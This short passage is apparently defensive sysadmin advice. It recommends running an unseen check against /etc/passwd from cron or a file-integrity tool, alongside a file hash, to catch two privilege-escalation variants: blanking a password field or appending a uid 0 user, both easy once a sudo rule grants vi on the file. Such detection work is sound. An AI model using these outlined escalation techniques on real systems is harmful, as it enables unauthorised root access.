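Run it against /etc/passwd from a cron job or a file-integrity check; together with a hash of the file it catches both variants of this escalation (blanking the field or appending a new uid 0 user) that a sudo rule granting vi on /etc/passwd makes trivial.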